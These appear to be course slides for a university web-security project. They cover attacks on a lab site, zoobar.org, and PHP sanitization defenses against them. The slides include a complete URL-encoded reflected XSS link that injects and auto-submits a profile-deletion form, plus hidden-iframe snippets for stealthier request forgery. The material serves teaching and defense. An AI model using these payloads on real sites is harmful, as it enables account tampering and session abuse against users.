Transcript Spring 2007 CS 155 Project 2: Web App Security Collin Jackson Part 1 Attacks.

Spring 2007
CS 155
Project 2: Web App Security
Collin Jackson
1
Part 1
Attacks
2
Overview
• Explore several
attack types
• Requires both
effectiveness
and stealth
Learn:
• How an attacker can evade sanitization
• Consequences of an exploit
• JavaScript
• Very basic CSS
3
Attacks
A: Cookie Theft
 Use URL encoding
 Could hijack session
lin
k
zoobar.org email
C: Password Theft
 Evade sanitization
 Handle DOM events
B: Request Forgery
 Navigate browser
 Use iframes, forms
badguy.com
zoobar.org
stanford.edu
D: Profile Worm
 Persistent attack
 Replicates
badguy.com
zoobar.org email
zoobar.org
4
Sanitization
Works differently depending on context
<tag property=" attackstring ">
 Attack: Break out with
' "
 Defense: escape quotes with \
<body> attackstring </body>
 Attack: Launch script with < >
 Attack: Close off parent tag </tag>
 Defense: escape angle brackets
eval( attackstring )
 Attack: Do whatever you want
 Defense: Don’t do that
5
Example: Profile Deleter
???
Malicious hyperlink deletes
profile of user who clicks it
Only works when user logged in
 User might have multiple tabs open
 Might have chosen/forgotten not to log out
 Might appear in another user’s profile
Uses vulnerability in users.php from Attack A
Constructs profile deletion form and submits it
6
Find vulnerability
Site reflects
query parameter
in input field
Link can include
anything we
want here
7
Copy form data
View source
to find form
fields
Create copycat
form with our
modifications
8
URL encode
http://scriptasylum.com/tutorials/encdec/encode-decode.html
Close
previous
<input>,
<form>
http://www.dommermuth-1.com/protosite/experiments/encode/index.html
Button
click triggers
form submit
9
Debugging
It didn’t work.
Open JavaScript
console
Check error
Undefined 
No properties!
Two forms
with same
name
10
Fixed version
Now with
correct
form
11
Final Test
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform
%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%
2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22
Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28
%29%3C%2Fscript%3E
users.php
replaced
with index.php
Profile deleted
12
Stealthier approaches
Post form into hidden iframe
<form name=F action=/index.php target=myframe>…
<iframe name=myframe style=“visibility:hidden”>…
Open page with form in hidden iframe
<iframe name=myframe style=“visibility:hidden”>…
<script>document.myframe.contentDocument.forms[0]
.profile_update.value =“”;</script>
13
Part 2
Defenses
14
Goals
Little programming knowledge can
be a dangerous thing
Learn:
• How easy it is to make mistakes
• That even simple code can be hard to secure
• Techniques for appropriate input validation
• PHP
• Very basic SQL
15
File structure
index.php
users.php
Only edit these files
transfer.php
login.php
includes/
 auth.php (cookie authentication)
 common.php (includes everything else)
 navigation.php (site template)
db/
 zoobar/
 Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…
16
txt-db-api
Third-party text file database library
Data can be int, string, and autoincrement
Need to escape strings: \' \" \\
Actually magic_quotes_gpc does this for us
$recipient = $_POST[‘recipient’]; // already escaped
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
$rs = $db->executeQuery($sql);
if( $rs->next() )
$id = $rs->getCurrentValueByName(‘PersonID’);
17
Defenses to Part 1
A: Cookie Theft
B: Request Forgery
C: Password Theft
Attack D: Profile Worm
18
PHP Sanitization Techniques
addslashes(string)
 Prepends backslash to
' " \
 Already done by magic_quotes_gpc
 Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
 Converts
& < > " to HTML entities
 Use ENT_QUOTES to change
' to &#039;
strip_tags(string, [, allowable_tags])
 Max tag length 1024
 Does not sanitize tag properties
preg_replace(pattern, replacement, subject)
More info: http://php.net
19
More XSS hunting
Look for untrusted input used as output
Note sanitization already applied to each variable
 Form data has magic_quotes_gpc, db data does not
Sanitize the output if necessary
 No penalty for erring on the side of caution
 But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
20
Good luck!
21